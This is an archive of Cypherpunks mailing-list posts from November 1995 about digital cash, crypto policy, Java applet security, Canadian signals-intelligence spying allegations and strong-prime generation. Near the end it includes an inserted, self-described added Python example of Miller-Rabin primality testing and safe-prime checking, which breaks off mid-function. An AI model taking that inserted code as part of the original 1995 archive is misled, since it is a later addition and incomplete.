Sameer's done it, I'm going to do it, and I'm hoping that everyone who
*can* do it *will*.

Lumpy though MTB may be, they're taking a risk that no one else in the
financial community would, and they deserve whatever support we can give
'em.

If they do it and it works, there will be others. Come on, people, let's
make it work.

Put your e$ where your mouth is, or at least on a hard drive somewhere...

http://www.marktwain.com/ecash.html


Cheers,
Bob Hettinga



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Thu, 16 Nov 1995 11:21:46 +0800
To: rah@shipwright.com
Subject: Re: e$: Come aaaannnndddd Get it!
Message-ID: <01HXORFUEO5Y8WY0P1@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From: rah@shipwright.com (Robert Hettinga)

Sameer's done it, I'm going to do it, and I'm hoping that everyone who
*can* do it *will*.

Lumpy though MTB may be, they're taking a risk that no one else in the
financial community would, and they deserve whatever support we can give
'em.

If they do it and it works, there will be others. Come on, people, let's
make it work.

Put your e$ where your mouth is, or at least on a hard drive somewhere...
-------------------
	I will as soon as someone comes up with a _fully_ private digital
cash system and starts using it for something. As I understand it, Chaum's
ecash system is not one (i.e., non-privacy to the sender and of amounts to the
bank). If I'm incorrect, please tell me and I'll set up an account with MTB
immediately (if there's a text-based interface).
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phillip M. Hallam-Baker" <hallam@w3.org>
Date: Thu, 16 Nov 1995 11:24:19 +0800
To: w3t@w3.org
Subject: COE Recommendation No. R (95) 13
Message-ID: <9511160302.AA17272@www18.w3.org>
MIME-Version: 1.0
Content-Type: text/plain


This is that Council of Europe "Ban Crypto" paper. It is of course
nothing like what it is claimed to be 

http://www.privacy.org/pi/intl_orgs/coe/info_tech_1995.html

In particular:

6. The law should permit investigating authorities to avail themselves
of all necessary technical measures that enable the collection of traffic
data in the investigation of crimes. 

"COLLECTION" - not comprehension

8. Criminal procedure laws should be reviewed with a view to making
possible the interception of telecommunications and the collection of
traffic data in the investigation of serious offenses against the
confidentiality, integrity and availability of telecommunications or
computer systems. 

This is simply to fix the German data protection laws and similar, some 
of which might prevent a sysop monitoring a hacker on a system they were 
hacking.


I think the majority of the text is well thought out and very much in
line with what we would want. The piece on encryption is a cop out
to please the French and Dutch. Read it carefully and you will see
it says absolutely nothing.

We have been had again...


Rule number one of politics, always assume that the enemy are 
misrepresenting their case. Council of Europe declarations are almost 
always implemented because they say almost nothing. It is a very
clear statement of some concerns which it would be nice if the 
US authorities understood - separation of search and seizure.

This is not a trend in which Europe is following the US. We are
simply thinking about the effect of technology on law enforcement
rather than reacting to its effects.

Found this written up in cipher, well worth a visit.

http://www.itd.nrl.navy.mil/ITD/5540/ieee/cipher/


--
Phillip M. Hallam-Baker            Not speaking for anyone else
hallam@w3.org http://www.w3.org/hypertext/WWW/People/hallam.html
Information Superhighway -----> Hi-ho! Yow! I'm surfing Arpanet!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Thu, 16 Nov 1995 11:41:42 +0800
To: jsw@netscape.com (Jeff Weinstein)
Subject: Java Security Class in Netscape (was: Netscape rewards are an insult)
In-Reply-To: <30AAA306.64CF@netscape.com>
Message-ID: <199511160324.WAA25357@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain



Jeff wrote:
> All of these security measures are implemented by Netscape in the
> current release.  Specifically, Netscape Navigator 2.0beta2
> includes all the applet security precautions detailed in the recent
> comp.lang.java posting.  Netscape has been shipping the fixed
> applet security model for over a month (since 2.0Beta1), and
> Netscape and Sun continue to cooperate and work closely on applet
> security issues.

All of these are very conservative measures and they seem to be the
best approach for the present. They do remove some of the more
interesting features of Java. Sun commented to me in an interview that
"we would not see a more complex security model until they adding
encryption and digi-sig's, etc."

My question is, can a corporate user replace the security class in
Netscape. I understand that all the class libs are in an external
file. While a virus might exploit this... my reason for asking is for
corporate developers who are building "intra"net systems.. making some
tweaks to the security class would give them the flexibility they need.
Otherwise we have taken much of the fun out of Java. (for good
reasons).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 17 Nov 1995 15:33:14 +0800
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: Netscape rewards are an insult
In-Reply-To: <30AAA306.64CF@netscape.com>
Message-ID: <199511160333.WAA08987@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jeff Weinstein writes:
> All of these security measures are implemented by Netscape in the
> current release.  Specifically, Netscape Navigator 2.0beta2
> includes all the applet security precautions detailed in the recent
> comp.lang.java posting.  Netscape has been shipping the fixed
> applet security model for over a month (since 2.0Beta1), and
> Netscape and Sun continue to cooperate and work closely on applet
> security issues.

I've got to note just one thing -- every Netscape 2.0beta2 I've used
has been so full of bugs, and so prone to problems, that I have my
wonders about what the security code looks like. I know, Jeff, that
it's all done by different groups -- but the Java stuff I've run in
2.0beta2 is so weirdly different than the supposedly compatible stuff
I've run under HotJava -- especially when it comes to crashing (and it
HAS crashed on me) that I have serious worries about the security of
the thing. I'd say the quality looks very much like an alpha release,
not "beta". I don't want to turn this to Javapunks so I won't say more
on this topic any time soon -- it's already been beaten into the
ground.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Phillip M. Hallam-Baker" <hallam@w3.org>
Date: Thu, 16 Nov 1995 11:59:41 +0800
To: cypherpunks@toad.com
Subject: THE FRONT PAGE
Message-ID: <9511160347.AA17470@www18.w3.org>
MIME-Version: 1.0
Content-Type: text/plain


I've edited this down, for fair use reasons, you can get the idea... 

Worth subscribing to this paper BTW.


> The Electronic Telegraph  Thursday 16 November 1995  The Front Page
> 
> 'Black Baron' computer virus writer jailed for 18 months
> 
> By Robert Uhlig, Technology Correspondent
> 
> Devils in disguise that preyed on computers
> 
> THE man who wrote computer viruses which could cause millions of
> pounds of damage, was jailed for 18 months yesterday.
> 
> Christopher Pile, who called himself the Black Baron, not only spread his own
> viruses, Exeter Crown Court was told, but also distributed across the world his
> program which let other hackers disguise their own viruses.

> The viruses have made the "Black Baron" notorious among British companies.
> Microprose estimated it lost up to 500,000 and used more than 480 staff hours
> checking more than a million files. The computer firm Apricot had to shut down
> and check many of its machines. It found that 22 out of 60 had been infected by
> Pathogen.


-- 
Phillip M. Hallam-Baker            Not speaking for anyone else
hallam@w3.org http://www.w3.org/hypertext/WWW/People/hallam.html
Information Superhighway -----> Hi-ho! Yow! I'm surfing Arpanet!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: byerr@netcom.com (greeeeeeaaaaaat*)
Date: Thu, 16 Nov 1995 13:10:22 +0800
To: cypherpunks@toad.com
Subject: Professional interview wanted for report
Message-ID: <199511160456.XAA28418@netcom22.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi.  I'm a freshman at the Thomas Jefferson High School for Science
and Technology in Fairfax County, Virginia.  I am writing a (general)
report on cryptography for school, and I was wondering if anyone on
this list that works with cryptography in their job would be able to
give me a short interview over email.  Thanks a lot!

-- 
Ben Byer      byerr@netcom.com     I am not a bushing
GCS d-- s: a--- C++ UL++++ P++ L++ E+ W+ N++ o K-- w-- !O M-- !V !PS
!PE Y+(++) PGP t+ 5 !X R tv(+) DI+ G e- h! r !y




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: combee@techwood.org (Ben Combee)
Date: Thu, 16 Nov 1995 15:02:58 +0800
To: cypherpunks@toad.com
Subject: Need advice on video
Message-ID: <199511160651.AAA29375@matrix.eden.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello, fellow cypherpunks.  This is my first post here on the global
CP list, although I've been working with the just-reformed Austin
chapter for the last couple of months.

Us Austinites are working on a video for public access television
on cryptography.  We are looking at a one-hour format, similar to
a science program, that will introduce cryptography, its history,
the basic ideas of modern crypto, and what applications there are
for it today and in the future.

Now, this might turn into a series, but for now, we are concentrating
on the overview episode.

What I'm fishing for here are any suggestions for ways to present
some of this content in an interesting video setting.  We've already
decided on doing some algorithm animation, and maybe some simple
moving graphics illustrating the various protocols.  Any ideas you
might have would be appreciated.

BTW, once we finish this and show it locally, we are considering
doing some duplication to send out to interested bodies.  Do you
think there is demand for a good, clear intro to all this in video
form?

Thanks,
-- 
        eebmoC .L nimajneB | Benjamin L. Combee                (REVERSE) 
       gro.doowhcet@eebmoc | combee@techwood.org           (ENGINEERING) 
\eebmoc\ten.kay.www\\:ptth | http://www.yak.net/combee/        (RESERVE)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Fri, 17 Nov 1995 05:44:20 +0800
To: cypherpunks@toad.com
Subject: Evil Mail
Message-ID: <199511160420.FAA07007@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



WSJ, November 15, 1995

America Online to Warn Users About Bad E-Mail


Vienna, Va. -- It's a case of myth becoming reality in
the digital age.

America Online Inc. plans to warn subscribers of a
damaging piece of electronic mail that could corrupt
their computers' hard drives.

The existence of the destructive file follows a long-term
hoax that has been dogging AOL for months. Last year, a
user began circulating a warning about a "Good Times"
virus that would crash users' PCs if they so much as read
the piece of electronic mail. AOL, the Federal
Communications Commission and the Pentagon repeatedly had
to label the alleged virus a hoax.

But the new file is all too real. The destructive file,
attached to electronic mail, has been circulated through
the on-line service and the Internet. Receiving the
e-mail wouldn't harm a user's computer, but trying to run
the attached file, known as AOL Gold or "install.exe,"
could render a hard drive inoperable, an AOL spokeswoman
said.

The company said it has notified various
computer-security agencies about the program. AOL also
plans to post a letter for its four million users
strongly urging them to forgo "downloading attached files
from people you don't know."

Security experts fear that such Trojan Horses will
proliferate as programs become easier to attach to
electronic mail and the use of networks grows.

-----












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 16 Nov 1995 22:15:05 +0800
To: cypherpunks@toad.com
Subject: Re: CSE gets flak on TV
Message-ID: <199511161400.GAA00778@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 14 Nov 1995 s1113645@tesla.cc.uottawa.ca wrote:

> For those who care, the Communications Security Establishment has been
> getting some flak for spying on Mex. during NAFTA talks and on Korea to
> help us sell Can. nuke reactors:
> (This rather mirrors the trouble their sister agency, the NSA, has been 
> getting into)
> (sorry the online newscasts were rather vague)

Hmm, actually the news tape is reading a little strange here in Canada.
Not AP, or REUTERS, but simply the Canadian Press newswire.

Let's see ... over the last couple of days, we've had one provincial
Premier resign over "BingoGate" -- kickbacks from bingo games, another
premier is under some pretty heavy fire for some insider trading in a
company he promoted in Hong Kong, (actually his wife got stock she never
had to pay for), while Canada in conjunction with the normally very
neutral Swiss have frozen accounts pertaining to about $20 million or so
in kickbacks from Airbus Industries to a "senior Canadian politician". 

And all these stories ... coincidentally ... broke back to back.

It's almost as though the country is disinfecting itself, or has taken 
one particularly powerful laxative.

But the CSE story is really, really smelly.  The worst of the whole lot. 

I think that there might be more to this than appears on the surface. 
Maybe filling in some details might help our friends on this list.

You listening, Perry???

              *             *            *


On Tue, 14 Nov 1995 s1113645@tesla.cc.uottawa.ca wrote:

>    Electronic snooping part of the game
>    
>    
>    OTTAWA (CP)--Intelligence experts say it's no big secret that Canada's
>    high-tech spy agency snoops on friendly countries for financial gain. 

No big secret??  It was news to me. ;-)

>    Increasingly, intelligence agencies around the world are using their
>    antennas, computers and codebreakers to gather economic information,
>    Wesley Wark, a University of Toronto history professor, said Monday.
>    
>    Some of Canada's largest trading partners--including the United
>    States, France and Japan--comb the airwaves for useful information, so
>    Canada would be foolish not to join the game, said Wark. 

Wark actually continued here.  He said:  "I don't know what a friendly
power in the economic sphere is, exactly, these days.  That seems to be a
very ambiguous term."

(Of course, this is diplo-dodo-speak for something ... I think ... but 
I'm not sure what.)

>    Canada's secretive Communications Security Establishment--an arm of
>    the Defence Department--collects and analyses communications traffic
>    on the activities of foreign states, corporations and people.
>    
>    Jane Shorten, a former CSE employee, told CTV News in an interview
>    Sunday the agency spied on Canada's allies and trading
>    partners--including Mexico and South Korea--by eavesdropping on
>    embassies, consulates and diplomats.

There was also a followup segment, broadcast Monday.  I think that "Jane
Shorten" said that the CSE intercepted telephone conversations and faxes
of Canadians working at FOREIGN embassies in Canada.

But Prime Minister Chretien, in ... New Zealand ... at a meeting of the
Commonwealth did not deny Canada is spying on allies, but he did say that
"This is an organization that works within the law of Canada". 

He also said, "They do not report to me on a daily basis and I cannot make
any comments on if they are spying on anybody.  I don't know.  But they
have the mandate to check a few things around the world.  Probably
somebody is listening to us at this moment." 

Later the Prime Minister said that if any laws have been broken, "somebody
will have to pay the price." 

Ottawa maintains that the CSE, the NSA and their counterparts in Britain, 
Australia, and New Zealand have all agreed not to spy on each other.  He 
also said that the CSE does not target Canadians and scrupulously abides 
by Canadian laws.

"Jane Shorten" said in her Sunday broadcast, "I have lived with this 
information for so long and I just think that it is time that Canada 
knows what the CSE is doing."

"Shorten" worked as an analyst for the CSE from 1986 to 1994 when she was
laid off.  "Shorten" said that the agency spied on Canada's allies and
trading partners, eavesdropping on friendly embassies, consulates, and
diplomats in Canada and around the world. 

Ottawa denies it.  

"Countries like Canada have understandings that they don't carry out these
activities against each other."  Solicitor General Herb Gray said earlier
this year in response to claims that the US Central Intelligence Agency
had spied on the Japanese delegation during auto trade talks in Geneva. 

"Shorten" however replied:  "He does not know what's going on because CSE
is certainly doing that ... I spied on the (South) Korean government for
the Canadian government." 

[I think she was referring to Atomic Energy of Canada's sale of nuclear 
power plants ... possibly ... but I don't know, about AECL.]

Today, it was reported by the deputy prime minister -- since the Prime
Minister is away at an economic conference in Japan -- that there will be
a review of operations to make sure that the Communications Security
Establishment is obeying the law. 

"And if, in fact, there has been illegal activity going on, we'll want to 
deal with that in as public a way as possible," said Sheila Copps.

The Mexican government has presented a diplomatic note to Canada
expressing "surprise and concern" over the report that it was spied on
during the North American free-trade talks. 

South Korea is looking into the matter as well. 

The head of the Canadian Civil Liberties Association wants an independent
committee to oversee CSE operations.  Alan Borovoy, angered by the
suggestions of spying on Canadians, said a watchdog could put pressure on
politicians to make changes if the CSE steps over the line. 

International diplomacy experts said the allegations of economic espionage
wouldn't damage Ottawa's relations with the countries. 
      
                      --  E N D --


And I guess ... that's all of the news that I've got to this hour.  Except
for one brief note, that Prime Minister Chretien tried to call the States,
but the Government shutdown meant that his call couldn't get through.  
I think he tried to call NASA.

Speaking personally, I just think that something is a bit fishy. I mean 
"Jane Shorten" is a nym if I ever heard one ... probably married to
"Dick Lengthen" or something.  But putting my wry sense of haha, aside 
there are some serious questions.

How does someone cleared for TOP SECRET UMBRA, like our dear "Jane
Shorten" say, "I have lived with this information for so long and I just
think that it is time that Canada knows what CSE is doing."  And then
later say:  "I feel so strongly that it's time that people learned what CSE
is all about." 

I mean ... HELLO .... GiGGle TesT ... what on earth did she think the CSE 
did?? Made snowmen and skated on the Rideau Canal??

"Shorten" apparently is quite distraught, over the stepped up CSE
operations in 1991.  Operations targeted at foreign embassies in Canada.
She recalled overhearing conversations of Canadians employed there -- even
one woman's phone call to her doctor.  She was appalled and confronted her
boss, who assured her that the practice was legal. 

I mean, whop dee doo ... "Shorten" overheard a patient/doctor telephone
call that a Canadian made from their place of work -- a foreign embassy.

Did she listen with great intent and interest, or did she simply try not
to listen??  If "Shorten" was so distraught at listening in on personal
information, she should have closed her ears.  I mean, this is Canada,
what is the problem if we listen to people who work in embassies?? 

The agency IS obligated to destroy information about Canadians it scoops 
up in its electronic net.  A rare exception might be a phone call 
describing a terrorist plot, but that would truly be exceptional, I think.

I mean it's not like one big fishing expedition.

In any event, "Jane Shorten" returned to Canada from New York, this last
evening.  

She told CTV she was aware her revelations could result in
prosecution under the Official Secrets Act but she felt the risk of prison
was worth it. 

And that's the fleshed out version of the story.

I'm just sorry that our Prime Minister is in such a bad position because 
of the timing of this "Jane Shorten's" revelations.  She also revealed 
that Canada spied on Japan.

To think ... Canadian Prime Minister Chretien is a guest of the Japanese
people today.  Talk about some awkward moments.  I mean, what on earth do
you talk about?? 

George Bush and Sushi??




Alice de 'nonymous ...

                                  ...just another one of those...
                                                   ...hunters...

P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.














From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Thu, 16 Nov 1995 23:00:00 +0800
To: cypherpunks@toad.com>
Subject: Re: e$: Financial Cryptography for Dogs, pt. 2.  OpenDoc Kitchen, anyone?
Message-ID: <v03003c06acd09c889725@[129.46.82.91]>
MIME-Version: 1.0
Content-Type: text/plain


In Reply to the Message wherein it was written:
[elided]
>I've heard about something called an OpenDoc Kitchen, which is a periodic
>hack fest put on by Apple for developers of OpenDoc parts where code is
>actually written.
>
>My understanding is that this will be held at Apple, in Cupertino, in
>early December.

That was at Apple in Cupertino, 11-13 NOVEMBER, not December. Whoops...I
heard about it from Jose Carreon earlier and should have spoken up sooner,
but there'll be another.

Attendance by Marcel and/or Felix at such a "kitchen" would be an
*excellent* idea. An OpenDoc-ish model will undoubtedly be the one many
different OS designers (can you say "redmond?") at least copy someday for
look and feel, so it would be smart for DigiCash/Ecash to be in on the
early payment models. And anyway, Marcel could use a relaxing visit to
sunny California so he can hand-lob a grenade at my house. ;)

>They are especially interested in anyone from Digicash who would like to
>make a digital cash OpenDoc component for Cyberdog, because I've been
>ranting to them about this picture in my head of someone dragging digital
>cash icons onto a register icon in a web browser to pay for a purchase.
[elided]

You're on _exactly_ the right track, Robert. I hope everybody listens to
you. As DC -- or perhaps whatever commercial client development company DC
chooses to license the Ecash technology to for spreading this
valuable-to-humanity technology far beyond the reach of "only" the big
financial companies -- well knows, the version _after_ the next version of
the Ecash client will have to be as easy to use as a smartcard if anyone
really expects to [insert your favorite politically-sensitive verb here]
the worldwide flow of value, perhaps making it more convenient for everyone.

The register idea is an interesting one, but I think the belt coin-changer
interface is more to the point, both graphically, and metaphorically. The
non-expert Person in the Street (maybe even the street-people) will do very
well with something like that.

   dave






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 16 Nov 1995 20:29:25 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: e$: Come aaaannnndddd Get it!
Message-ID: <v02120d01acd0da4ef02b@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:57 PM 11/15/95, E. ALLEN SMITH wrote:
>-------------------
>        I will as soon as someone comes up with a _fully_ private digital
>cash system and starts using it for something. As I understand it, Chaum's
>ecash system is not one (i.e., non-privacy to the sender and of amounts to the
>bank). If I'm incorrect, please tell me and I'll set up an account with MTB
>immediately (if there's a text-based interface).

Ahhh. Next year in Jerusalem...

Tell me, are you actually selling something on the net yet? How many
customers do you have?

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Barrett/CheckFree Corporation <Andrew_Barrett@checkfree.com>
Date: Thu, 16 Nov 1995 22:04:48 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: -No Subject-
Message-ID: <9511161654.AA0590@6thstreetcheckfree.com>
MIME-Version: 1.0
Content-Type: text/plain


Over 2000 years ago, Nostradamus predicted that on Tuesday November 14, 1995, 
Phil would say:

><...>Or at least there is a requirement for the
>assistant to enter the extra four digits in certain cases. The precise
>nature of the circumstance when they are required to be card present I
>am not sure (in fact I would bet they vary).

I'm betting your bet is right. When you set up your persona/nym for use with 
the CheckFree wallet, the software does ask for those four, non-embossed 
numbers on the Amex card - which I had never really noticed 'til then. And I 
frequently pass the amex number on the phone for business stuff.

Just last week, I had flowers sent to some partners of ours that we had just 
completed a deal with (sorry...should have ordered them over the net), and the 4 
"flat" numbers were not required.

Hmmmm ....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom DeNapoli <denap@isis.com>
Date: Thu, 16 Nov 1995 22:21:29 +0800
To: cypherpunks@toad.com
Subject: Q: blind maildrop anyone?
Message-ID: <199511161409.JAA08809@polyphony.sw.stratus.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi,

I am not on this mailing list so please reply by email.
It was recommended to me by someone who is on the list that you(s) might
be able to point me to the right place (or page).

What I'd like to do is: establish an email account, other than the one I'm
posting from; preferably on some free email/homepage box, that would encrypt
all cleartext email to hit that account for me at this account.  I have tried,
unsuccessfully, to establish this at c2, which offers this service.

My question: has anyone done this successfully at c2, or another location, 
and would you be willing to point me in the right direction to accomplish this?

thanks,
-Tom 
Tom DeNapoli <denap@isis.com>
26 EC 2B 5A 0B 54 6D EE  1C 3F B6 AE 14 AA 83 87





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andy Brown <asb@nexor.co.uk>
Date: Fri, 17 Nov 1995 22:49:52 +0800
To: cypherpunks@toad.com
Subject: Re: 4096 bit strong prime for Diffle-Hellman
In-Reply-To: <Pine.SOL.3.91.951114090156.23102A-100000@orb>
Message-ID: <Pine.SOL.3.91.951116091316.19868C-100000@eagle.nexor.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 14 Nov 1995, Eric Young wrote:

> Just for anyone interested, I 'found' a suspected 4096 strong prime (p and
> (p-1)/2 are prime) for use with Diffie-Hellman, generator of 2.

As a matter of interest, how long did it take you to generate this, and
with what hardware?  I left a 120MHz Pentium searching for 15 hours
overnight without any success (it managed to eliminate 10 candidate primes
as not strong in that time). 


Regards,

- Andy

-----------------------------------------------------------------------
 Andrew Brown  Internet <asb@nexor.co.uk>  Telephone +44 115 952 0585
 PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A  C0 1F 9F 66 64 02 4C 88
 All views expressed here are my own and not those of my employer





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Fri, 17 Nov 1995 00:01:40 +0800
To: cypherpunks@toad.com
Subject: RSA-perl T-shirt
Message-ID: <199511161547.JAA13166@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


I've received several requests, and just want to let *everyone* know that
the T-shirt I have that scanned was from Joel. I must confess that I don't
know why it should make any difference, but.....

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geopages.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Thu, 16 Nov 1995 23:08:31 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: Anonymity and Intellectual Capital
In-Reply-To: <199511160148.RAA18908@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.91.951116095111.27012I-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


For an earlier treatment of a related subject, see my:
Anonymity and Its Enmities 
http://www.law.cornell.edu/jol/froomkin.htm

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 17 Nov 1995 02:32:00 +0800
To: EALLENSMITH@ocelot.rutgers.edu>
Subject: Re: e$: Come aaaannnndddd Get it!
Message-ID: <acd0ba0e02021004a15b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:18 PM 11/16/95, Robert Hettinga wrote:
>At 8:57 PM 11/15/95, E. ALLEN SMITH wrote:
>>-------------------
>>        I will as soon as someone comes up with a _fully_ private digital
>>cash system and starts using it for something. As I understand it, Chaum's
>>ecash system is not one (i.e., non-privacy to the sender and of amounts to the
>>bank). If I'm incorrect, please tell me and I'll set up an account with MTB
>>immediately (if there's a text-based interface).
>
>Ahhh. Next year in Jerusalem...
>
>Tell me, are you actually selling something on the net yet? How many
>customers do you have?

Bob, let me do a minor vent here.

You are critical of E. Allen Smith's viewpoint, and essentially question
whether he has anything to sell. Not much of an argument.

Especially when folks are urging that "people put their money where their
mouth is" and get MTB accounts.

Me, I don't plan to sign up for various reasons:

1. I'm not selling anything, and won't sign up just for "moral support." (I
tried this once before, getting an AMIX account early on, and that system
offered more of a chance for a 2-way market. Still, a waste of my time.)

2. I wish Mark Twain Bank well, but the success of the kinds of digital
cash we hope to see will not likely hinge on the success of one particular
operation, such as MTB.

3. The success of BankAmericard (later renamed Visa) came when real
customers and real shops started to use it, not when early pioneers set
themselves up as clearinghouses and whatnot.

I have more interesting things to do, personally, than to be a pioneer so I
can then have nothing to sell, and little to buy....when "interesting
markets" start to appear, I'll look at it again.

In any case, I wish all the pioneers well, and am happy to see Lucky
Green's involvement.

But when you urge people to be pioneers, and they express reservations or
doubts about the system, attacking their motives or implying they have
nothing to sell anyway is not too helpful.

Just my views, but, then, I don't have any customers either.

--Tim May



Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 16 Nov 1995 23:48:43 +0800
To: Dave Del Torto <ddt@lsd.com>
Subject: Re: e$: Financial Cryptography for Dogs, pt. 2.  OpenDoc Kitchen, anyone?
Message-ID: <v02120d03acd1082f811b@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>That was at Apple in Cupertino, 11-13 NOVEMBER, not December.

The one I'm talking about *is* in fact in December, folks,

Please contact me if you want to come, folks!

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjnesser@asgaard.rocket.com (Philip Nesser)
Date: Fri, 17 Nov 1995 02:57:19 +0800
To: cypherpunks@toad.com
Subject: primality code
Message-ID: <9511161826.AA10763@asgaard.rocket.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Can someone point me in the right direction for any archives of code to do
primality testing?  I would rather not have to write something from
scratch.


- --->  Phil

pjnesser@rocket.com
(206)885-5010x5477 (voice)
(206)882-5750      (fax)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----
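
The request above for primality-testing code, and the earlier thread on searching for a "strong" Diffie-Hellman prime (p and (p-1)/2 both prime, generator 2), both come down to the same routine. The following is an added example, not part of any original post and not Eric Young's or Andy Brown's code: a Miller-Rabin test with a search for such a prime. The function names, the sieve bound of 2000 and the 40 rounds are assumptions chosen for the illustration.

```python
import secrets

# Odd primes below 2000, used for cheap trial division before Miller-Rabin.
# (The bound 2000 is an arbitrary choice for this example.)
SMALL_PRIMES = [p for p in range(3, 2000, 2)
                if all(p % d for d in range(3, int(p ** 0.5) + 1, 2))]


def is_probable_prime(n, rounds=40):
    """Miller-Rabin with random bases; a composite passes with probability <= 4**-rounds."""
    if n < 2:
        return False
    if n in (2, 3):
        return True
    if n % 2 == 0:
        return False
    for r in SMALL_PRIMES:
        if n == r:
            return True
        if n % r == 0:
            return False
    d, s = n - 1, 0
    while d % 2 == 0:                      # write n - 1 = d * 2**s with d odd
        d //= 2
        s += 1
    for _ in range(rounds):
        a = secrets.randbelow(n - 3) + 2   # random base in [2, n - 2]
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False                   # a is a witness: n is composite
    return True


def is_safe_prime(p):
    """True when p and (p - 1) / 2 are both (probable) primes."""
    return (p > 4 and p % 2 == 1
            and is_probable_prime(p) and is_probable_prime((p - 1) // 2))


def two_generates_full_group(p):
    """For a safe prime p = 2q + 1 >= 5 the order of 2 is q or 2q.

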